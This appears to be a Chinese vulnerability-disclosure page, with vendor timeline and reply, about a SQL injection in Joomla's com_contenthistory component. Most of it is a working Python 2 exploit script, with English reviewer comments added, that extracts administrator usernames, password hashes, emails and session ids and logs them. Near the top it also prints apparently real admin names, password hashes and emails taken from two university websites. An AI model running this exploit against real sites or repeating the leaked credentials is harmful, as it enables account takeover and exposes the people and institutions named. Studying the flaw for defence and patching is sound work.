2015-10-29: 细节已通知厂商并且等待厂商处理中
2015-10-29: 厂商已经确认,细节仅向厂商公开
2015-11-08: 细节向核心白帽子及相关领域专家公开
2015-11-18: 细节向普通白帽子公开
2015-11-28: 细节向实习白帽子公开
2015-12-13: 细节向公众公开
梦里寻他千百度,蓦然回首那人却在灯火阑珊处!
url: http://www.nfu.edu.cn/, admin: hljkdlic, password: $P$DIvYV9IubMDGrs3UzM53tH9oEAQdw2/, email: hectorbonilha2018@gmail.comurl: http://www.nfsysu.cn/, admin: hljkdlic, password: $P$DIvYV9IubMDGrs3UzM53tH9oEAQdw2/, email: hectorbonilha2018@gmail.com
验证脚本:
# NOTE(review): Python 2 code (print statement, `except Exception, e`).
# `requests`, `re` and `logfile` are not defined in this excerpt; they are
# expected to be provided by the enclosing script.
def checkJoomlaSQLi(url):
    """Probe one Joomla site for the com_contenthistory SQL injection.

    Sends a GET to `index.php?option=com_contenthistory&view=history` whose
    `list[select]` parameter carries a MySQL error-based probe. The probe
    embeds the marker `avfisher` (the hex literal 0x6176666973686572); if the
    marker is echoed back in the response body the site is treated as
    vulnerable, and username, password hash, email and session id are then
    pulled one query each with getInfoByJoomlaSQLi and appended to
    `joomla_vuls.txt`.

    Detection note: the signature this script depends on is a request with
    `option=com_contenthistory` and a `list[select]=` value containing SQL,
    answered by a response that leaks a MySQL "Duplicate entry" error. The
    remediation given on this page is to upgrade Joomla.

    Args:
        url: Site base URL (scheme and host); surrounding whitespace is
            stripped before the probe path is appended.

    Returns:
        None. Outcome is printed; on a hit it is also written via logfile().
    """
    url = url.strip()
    poc = "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select 0x6176666973686572),floor(rand(0)*2))x from information_schema.tables group by x)a)"
    urlA=url+poc
    try:
        # verify=False: TLS certificate validation is disabled for this request.
        result = requests.get(urlA,timeout=30,allow_redirects=True,verify=False).content
        if 'avfisher' in result:
            # Marker echoed in the error text: extract the four fields.
            username = getInfoByJoomlaSQLi(url, 'username')
            password = getInfoByJoomlaSQLi(url, 'password')
            email = getInfoByJoomlaSQLi(url, 'email')
            session_id = getInfoByJoomlaSQLi(url, 'session_id')
            # getInfoByJoomlaSQLi returns None when its regex does not match;
            # the concatenation below then raises TypeError, which the broad
            # except clause reports as "connection failed".
            vuls='[+] vuls found! url: '+url+', admin: '+username+', password: '+password+', email: '+email+', session_id: '+session_id
            logfile(vuls,'joomla_vuls.txt')
            print vuls
        else:
            print '[!] no vuls! url: '+url
    except Exception,e:
        # Every failure (network error, timeout, the TypeError noted above,
        # a NameError raised by getInfoByJoomlaSQLi) is reported the same way.
        print '[!] connection failed! url: '+url


def getInfoByJoomlaSQLi(url, param):
    """Extract one database value through the same injection point.

    Builds the same com_contenthistory request as checkJoomlaSQLi, but the
    injected subquery selects a column from `#__users` (username, password,
    email) or `#__session` (session_id); `%23` is the URL encoding of `#`,
    Joomla's table-prefix placeholder. The value is concatenated with
    floor(rand(0)*2) and surfaces in a MySQL "Duplicate entry '<value>1'"
    error, from which the regex below strips the trailing 1.

    Args:
        url: Site base URL, as passed in by checkJoomlaSQLi.
        param: One of 'username', 'password', 'email', 'session_id', tested
            by substring (`'username' in param`) in that order.

    Returns:
        The captured value; None when the response contains no
        "Duplicate entry" text; the string 'no info!' when the request or
        the regex step raises.

    Raises:
        NameError: for any other `param`, because `payload` is never assigned
        and `urlA=url+payload` runs outside the try block.
    """
    if 'username' in param:
        payload = "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(username)) from %23__users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
    elif 'password' in param:
        payload = "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(password)) from %23__users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
    elif 'email' in param:
        payload = "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(email)) from %23__users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
    elif 'session_id' in param:
        payload = "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(session_id)) from %23__session limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
    urlA=url+payload
    try:
        # Same request shape as the probe; TLS validation disabled here too.
        result = requests.get(urlA,timeout=30,allow_redirects=True,verify=False).content
        # Non-greedy capture up to the "1'" produced by floor(rand(0)*2).
        reg = ".*Duplicate entry \'(.*?)1\'.*"
        match_url = re.search(reg,result)
        if match_url:
            info=match_url.group(1)
            return info
    except Exception,e:
        return 'no info!'
升级到最新版本的Joomla
危害等级:低
漏洞Rank:5
确认时间:2015-10-29 22:43
谢谢提醒,我们马上处理
暂无